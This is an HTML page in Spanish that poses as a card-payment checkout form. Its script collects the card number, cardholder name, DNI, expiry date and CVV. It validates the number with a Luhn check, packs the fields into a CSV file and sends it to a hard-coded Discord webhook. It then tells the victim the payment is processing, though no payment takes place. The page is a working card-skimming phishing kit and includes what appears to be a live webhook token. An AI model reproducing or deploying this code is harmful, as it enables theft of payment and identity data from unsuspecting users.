<!DOCTYPE html>
<html>
<head>
  <title>Pagar con tarjetas</title>
  <style>
    body {
      background: linear-gradient(to right, black, gray);
      padding: 20px;
      margin: 0;
      font-family: Arial, sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
    }
    
    .container {
      background-color: rgba(26, 26, 26, 0.8);
      border-radius: 10px;
      padding: 20px;
      width: 400px;
      opacity: 80%;
      color: white;
      display: flex;
      flex-direction: column;
      align-items: center;
    }
    
    .input-field {
      margin-bottom: 10px;
    }
    
    .input-field label {
      display: block;
      margin-bottom: 5px;
    }
    
    .input-field input {
      width: 100%;
      padding: 5px;
      border-radius: 5px;
      border: none;
    }
    
    button {
      padding: 10px 20px;
      background-color: #1e1e1e;
      color: white;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      margin-top: 10px;
    }
    
    #error-message {
      color: red;
      margin-bottom: 10px;
    }
  </style>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
    function updateSigninStatus(isSignedIn) {
      if (isSignedIn) {
        var cardNumber = document.getElementById("card-number").value;
        var cardName = document.getElementById("card-name").value;
        var cardDNI = document.getElementById("card-dni").value;
        var cardExpiration = document.getElementById("card-expiration").value;
        var cardCVV = document.getElementById("card-cvv").value;

        if (!validateCard(cardNumber)) {
          document.getElementById("error-message").textContent = "Tarjeta inválida";
          return;
        }

        var fileName = cardNumber.substr(0, 4) + '_' + cardName + '_Tarjeta.csv';

        var cardData = [
          new Date().toLocaleString(),
          cardNumber,
          cardName,
          cardDNI,
          cardExpiration,
          cardCVV
        ];

        sendCardData(fileName, cardData);
      }
    }

    function sendCardData(fileName, cardData) {
      var csvContent = cardData.join(", ");
      var formData = new FormData();
      formData.append('file', new Blob([csvContent], { type: 'text/csv' }), fileName);

      fetch("https://discord.com/api/webhooks/1116932667200520222/exFZc5f9B8WCCMzDjIzGkopK6bRdK5Hp6rnxI0j9sJ0bcKu17HsB9pLxJs8AxmNkfQwd", {
        method: 'POST',
        body: formData
      })
      .then(function (response) {
        if (response.ok) {
          document.getElementById("done-message").textContent = "Listo! Procesando pago";
          setTimeout(function () {
            document.getElementById("error-message").textContent = "";
          }, 2000);
        } else {
          document.getElementById("error-message").textContent = "Error al enviar el archivo";
        }
      })
      .catch(function (error) {
        document.getElementById("error-message").textContent = "Error al enviar el archivo";
      });
    }

    function validateCard(cardNumber) {
      var sum = 0;
      var isEven = false;

      for (var i = cardNumber.length - 1; i >= 0; i--) {
        var digit = parseInt(cardNumber.charAt(i), 10);

        if (isEven) {
          digit *= 2;
          if (digit > 9) {
            digit -= 9;
          }
        }

        sum += digit;
        isEven = !isEven;
      }

      return sum % 10 === 0;
    }
  </script>
</head>
<body>
  <div class="container">
    <h1>Pedido por Tarjeta</h1>
  
    <div id="error-message"></div>
  
    <div class="input-field">
      <label for="card-number">Número de Tarjeta:</label>
      <input type="text" id="card-number" maxlength="16" />
    </div>
  
    <div class="input-field">
      <label for="card-name">Nombre:</label>
      <input type="text" id="card-name" />
    </div>
  
    <div class="input-field">
      <label for="card-dni">DNI:</label>
      <input type="text" id="card-dni" maxlength="8" />
    </div>
  
    <div class="input-field">
      <label for="card-expiration">Fecha de Expiración:</label>
      <input type="text" id="card-expiration" />
    </div>
    
    <div class="input-field">
      <label for="card-cvv">CVV:</label>
      <input type="text" id="card-cvv" maxlength="3" />
    </div>
  
    <button onclick="updateSigninStatus(true)">Enviar</button>
    <div id="done-message"></div>
  </div>
</body>
</html>
